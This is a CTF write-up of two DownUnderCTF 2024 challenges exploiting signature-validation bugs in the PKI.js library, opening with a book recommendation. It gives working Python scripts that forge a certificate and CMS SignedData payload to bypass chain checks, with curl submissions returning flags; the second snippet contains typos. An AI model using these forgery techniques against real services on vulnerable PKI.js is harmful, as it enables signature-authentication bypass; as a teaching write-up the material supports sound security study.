DownUnderCTF 2024 – PKI.js Exploitation

Rustam Guseinov

Chairman of the cooperative RAD KOP

We continue the series of experimental materials with the analysis of CTF problems made by our friend Ratmira Karabuta. You can read the previous material at the link. Well, as is tradition, we will go a little “meta” and remind you of another good book. Namely, “Superlearning” by Scott Young (in the original “Ultralearning”).

Scott Young and his book "Super learning"

Scott Young and his book “Superlearning”

Why is this book so important and how does it relate to the CTF problem? Often people have beliefs that limit their development, such as: I am not good at languages, which means I cannot write exploits; I am bad at mathematics, which means I will never become a cryptographer; I… (underline as appropriate). Scott Young, who completed a 4-year bachelor's degree in Computer Science at MIT in 1 year (the famous Massachusetts Institute of Technology, similar to the Russian Moscow Institute of Physics and Technology) convincingly shows that with the right approach to learning (and self-study), there are no insurmountable obstacles. And if some classes of problems seem difficult or even impossible, do not get frustrated and give up. You need a plan to turn an unsolvable problem into a clear task. And here, one of the elements of preparation is the so-called drilling, when you, like an athlete honing his technique, bring to perfection an element of practice or a theoretical block that is especially difficult for you. So let's continue our journey, it will be even more fun =)

Let's look at two related DownUnderCTF 2024 challenges that require tricking the real cryptographic library PKI.js – they were solved by few teams (the second one had only one solution), and while I didn't have time to finish them myself during the competition, the elegance and realism of the vulnerabilities make them good candidates for a detailed analysis.

pkijs< - medium (203 points, 7 solves)

Task materials.

The description gives us a hint – apparently, there is some certificate validation error in version 3.0.15 of PKI.js used in the service being operated. Let's trust it and first check the changes in PKI.js from version 3.0.15 to the current 3.1.0 on GitHub:

Comparing v3.0.15…v3.1.0 · PeculiarVentures/PKI.js · GitHub

Among the commits it is quickly found interestingand in the pull request to it we see an assumption about the incorrect validation when transferring several certificates:

The commit fixes a classic oversight – modifying an array while iterating over it – in three places in the code; we are particularly interested in this part of the function. defaultFindIssuer()called (as findIssuer()) from verify():

    ...
    // Now perform certificate verification checking
    for (let i = 0; i < result.length; i++) {
      try {
        const verificationResult = await certificate.verify(result[i], crypto);
        if (verificationResult === false)
          result.splice(i, 1);
      }
      catch (ex) {
        result.splice(i, 1); // Something wrong, remove the certificate
      }
    }
    return result;

Array method splice() shifts the elements to the vacated space; this means that if at the time of verification in the final array result there will be at least two elements, then after deleting the incorrect first one, the check of the second one will be skipped, since its index will change to 0, and result will return non-empty. From the context, it can be understood that for findIssuer() this will mean the presumed validity of the certificates remaining in it as issuerthat is, a trust provider that confirms the authenticity of the final certificate.

But it follows that simply specifying the wrong provider twice will trick the library into believing that it actually authenticated correctly – and we see above in the function that result is filled with possible suppliers as from the one previously transferred to verify() list of trusted ones, as well as from the list of (presumably) intermediate certificates attached by the end user, that is, for this it should be sufficient to add the one already transferred to it trustedCerts root certificate:

    // Search in Trusted Certificates
    for (const trustedCert of validationEngine.trustedCerts) {
      checkCertificate(trustedCert);
    }

    // Search in Intermediate Certificates
    for (const intermediateCert of validationEngine.certs) {
      checkCertificate(intermediateCert);
    }

Now let's look at the service being attacked index.js. It accepts from us the structure in CMS format – Cryptographic Message Syntax – like SignedDatain which the correct message must be transmitted (I can forge a signed message!), signed with the attached root certificate root.crt – or, as stated in the verification parameters checkChain: trueany certificate certified with its help (that is, by it itself or indirectly through a chain) – it is assumed that such a chain of certificates is attached to SignedData.

Of course, it is possible to forge a signature directly without having access to the private part root.crtwe can't, but what if a bug in the library helps us force the service to accept an arbitrary certificate as trusted?

To begin with, let's create our own certificate – apparently, we can sign it with our own private key, not forgetting to specify the name of the certificate in the certification provider field root.crt. Flipping through documentation To pycryptography.x509 and having tinkered with the necessary fields, we make both:

from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import hashes, serialization
import datetime

root_cert = x509.load_pem_x509_certificate(open("./root.crt", "rb").read())
my_name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "hacker")])

privkey = rsa.generate_private_key(public_exponent=65537, key_size=2048)
pubkey = privkey.public_key()

cert = x509.CertificateBuilder() \
    .issuer_name(root_cert.issuer) \
    .subject_name(my_name) \
    .public_key(pubkey) \
    .serial_number(x509.random_serial_number()) \
    .not_valid_before(datetime.datetime.today() - datetime.timedelta(days=1)) \
    .not_valid_after(datetime.datetime.today() + datetime.timedelta(days=1)) \
    .sign(private_key=privkey, algorithm=hashes.SHA256())

der = privkey.private_bytes(
    encoding=serialization.Encoding.DER,
    format=serialization.PrivateFormat.PKCS8,
    encryption_algorithm=serialization.NoEncryption()
)

open("my_key.der", "wb").write(der)
open("my_cert.crt", "wb").write(cert.public_bytes(serialization.Encoding.DER))

Form the required structure SignedData in python you can use the library asn1cryptousing its tests as auxiliary information about the required fields (and, surprisingly, an example of generating an electronic signature for CryptoPro from here). Don't forget to carefully place the service's root certificate next to yours so that it appears in the list twice:

from asn1crypto import cms
from cryptography import x509
from cryptography.hazmat.primitives.serialization import load_der_private_key, Encoding
from cryptography.hazmat.primitives.asymmetric import rsa, padding
from cryptography.hazmat.primitives import hashes

root_cert = x509.load_pem_x509_certificate(open("./root.crt", "rb").read())
my_cert = x509.load_der_x509_certificate(open("./my_cert.crt", "rb").read())

root_cert_der = root_cert.public_bytes(Encoding.DER)
my_cert_der = my_cert.public_bytes(Encoding.DER)

my_key = load_der_private_key(open("./my_key.der", "rb").read(), password=None)
message = b"I can forge a signed message!"
signature = my_key.sign(message, padding.PKCS1v15(), hashes.SHA256())
my_cert_key_id = cms.Certificate.load(my_cert_der).public_key.sha1

my_signed_data = cms.SignedData({
    "version": "v1",
    "encap_content_info": {
        "content_type": "data",
        "content": message
    },
    "certificates": [cms.CertificateChoices.load(cert) for cert in [my_cert_der, root_cert_der]],
    "signer_infos": [
        {
            "version": "v1",
            "digest_algorithm": {
                "algorithm": "sha256",
                "parameters": None
            },
            "signature_algorithm": {
                "algorithm": "sha256_rsa",
                "parameters": None
            },
            "signature": signature,
            "sid": cms.SignerIdentifier({
                "subject_key_identifier": my_cert_key_id
            })
        }
    ],
    "digest_algorithms": [
        {
            "algorithm": "sha256",
            "parameters": None
        }
    ],
})

my_content_info = cms.ContentInfo({
    "content_type": "signed_data",
    "content": my_signed_data
})

open("payload.data", "wb").write(my_content_info.dump())

All that remains is to send the signed message to its destination, as required by the service:

$ curl https://misc-pkijs-lt-e1e6cbc5ad29.2024.ductf.dev/upload -F cms=@./payload.data
DUCTF{nice_splice_sice_a69bdb8eb2ca9e1}⏎

The first flag has been received!

pkijs= – medium (500 points, 1 solve)

Task materials.

In this task, with an identical service, PKI.js is updated to 3.0.16, which eliminates the previous bug, but in exchange the author introduces his own, less obvious one – the following patch is attached to the library:

--- a/node_modules/pkijs/build/index.js
+++ b/node_modules/pkijs/build/index.js
@@ -9256,7 +9256,7 @@ class Certificate extends PkiObject {
 }
 Certificate.CLASS_NAME = "Certificate";
 function checkCA(cert, signerCert = null) {
-    if (signerCert && cert.issuer.isEqual(signerCert.issuer) && cert.serialNumber.isEqual(signerCert.serialNumber)) {
+    if (signerCert && cert.issuer.isEqual(signerCert.issuer) && cert.serialNumber.isEqual(signerCert.serialNumber) && cert.signatureValue.isEqual(signerCert.signatureValue)) {
         return null;
     }
     let isCA = false;

From the comments in the code around this check, it is clear that it is intended to ensure that the certificate that signed the message cannot be mistaken for a central certificate, even if it is marked with the appropriate CA flag (via the extension BasicConstraintsas you can read below); it is interesting that the change enhances this check – if initially, as you can see, the match of the supplier and the serial number of the signatory was checked, now the match of the signature of the center is also checked.

As we can see, checkCA() used in one place verify():

      if (checkChain) {
        const certs = this.certificates.filter(certificate => (certificate instanceof Certificate && !!checkCA(certificate, signerCert))) as Certificate[];
        const chainParams: CertificateChainValidationEngineParameters = {
          checkDate,
          certs,
          trustedCerts,
        };

!! here (don't be mistaken, it cost me some time to untangle the code due to my lack of habit with js) means double negation, used in order to convert values ​​to a boolean type – that is, applied to SignedData the list of certificates is filtered for the presence of CAs in it, so that all of them, except the final signer (added later as the last one), belong to the certification chain.

Because I myself checkCA() relevant only in this place, let's look where else it is checked parsedValue.CA – and indeed, in CertificateChainValidationEngine this is done later in friend place function checkForCA()this time without any regard for the signatory. checkForCA()in turn, is used in only two places – one of them is of no interest to us, since it concerns CRLs that are not used in our case, and the second one re-guarantees that all intermediate certificates are CA:

...
        const result = await checkForCA(cert);
        if (!result.result) {
          return {
            result: false,
            resultCode: 14,
            resultMessage: "One of intermediate certificates is not a CA certificate"
          };
        }

What unusual thing can we do with the condition supplemented in this way? checkCA()? The only thing that comes to mind is – now, having changed signatureValue (which would not pass real verification anyway, since the certificate is self-signed), we will ensure that our own certificate appears in the list of intermediate ones – if it also has the CA attribute.

But how can our own duplicate certificate help us? Let's look at coderemoving identical (presumably intermediate) certificates from the list:

    //#region Check all certificates for been unique
    for (let i = 0; i < localCerts.length; i++) {
      for (let j = 0; j < localCerts.length; j++) {
        if (i === j)
          continue;

        if (pvtsutils.BufferSourceConverter.isEqual(localCerts[i].tbsView, localCerts[j].tbsView)) {
          localCerts.splice(j, 1);
          i = 0;
          break;
        }
      }
    }
    //#endregion

    const leafCert = localCerts[localCerts.length - 1]; 

    //#region Initial variables
    let result;
    const certificatePath = [leafCert]; // The "end entity" certificate must be the least in CERTS array
    //#endregion

The field is used to check equivalence. tbsViewnot affecting signatureValue – therefore, the self-signed certificate that got into localCerts twice with different signatureValue (both intermediate and final) will be counted as one and the same.

But the cycle removes it from the list right copy! This means that our certificate, encountered twice, will be removed from the last place – and instead of it, for the final leafCert the certificate listed immediately before it will be accepted. If it is trusted, root.crtthen this should probably be enough to bypass authentication – the comments make it clear that the code does not expect this to be possible.

However, how to arrange this? If we add to the list root.crtit will be deleted even before that, since it goes to the left as part of it trustedCerts. But wait, is it resetting correctly? i in a cycle?

After i = 0; break cycle i will move on to the next iteration and i will be incremented to 1; probably in a normal situation for the library this is not so important, because all that will change is the possibility of deletion left copies instead of the right ones in some circumstances, since j will still go through the entire list. But in the conditions of our patch, this is exactly what is needed – let's take the following order of certificates:

  1. (trustedCerts) root

  2. my_cert (with modified signatureValue)

  3. root

  4. root

  5. my_cert (signer)

Let's follow the logic of the cycle – certificate 2 will be removed first; since i will be reset not to 0, but to 1, the next match will be a pair of our certificates and the last 4 will be removed. i will reset to 1 again, j to 0, and the next match root.crt will remove from the list first certificate, leaving two – ours and the root, in exactly that order, and, accordingly, forcing the library to accept the root as the final one.

Let's test this theory – first, add the CA flag to our certificate:

...
    .add_extension(x509.BasicConstraints(ca=True, path_length=None), critical=False)

Secondly, let's put it on the list SignedData certificates in the correct order, spoiling the section in the first occurrence signatureData ours – turns outto do this it is enough to replace the last bytes in DER:

...
"certificates": [cms.CertificateChoices.load(cert) for cert in 
    [my_cert_der[-4] + b'deadbeef', root_cert_der, root_cer_der, my_cert_der]
],
...    

Let's give the resulting output to the server:

$ curl https://misc-pkijs-eq-91b37b2852e3.2024.ductf.dev/upload -F cms=@./payload.data
DUCTF{deduplicate_and_decimate_07bca839bad0b201b9d}⏎  

The second flag is ours!

Conclusion

Good tasks for exploiting real software are not so common, and the minimalism of bugs in particular deserves respect. Unfortunately, the second task, as can be seen from the number of solutions, turned out to be rather complicated even for a two-day CTF – the logic of the solution described by me here was, of course, accompanied by considerable efforts in dynamic debugging (fortunately, it was not so difficult to do it with the container in the delivery, applying to the original patch a patch with generously scattered throughout the library console.log()). Overall, Australia's DownUnder was excellent in quality and presentation this year – and hopefully will continue to be so in the future.

Similar Posts

Leave a Reply

Your email address will not be published. Required fields are marked *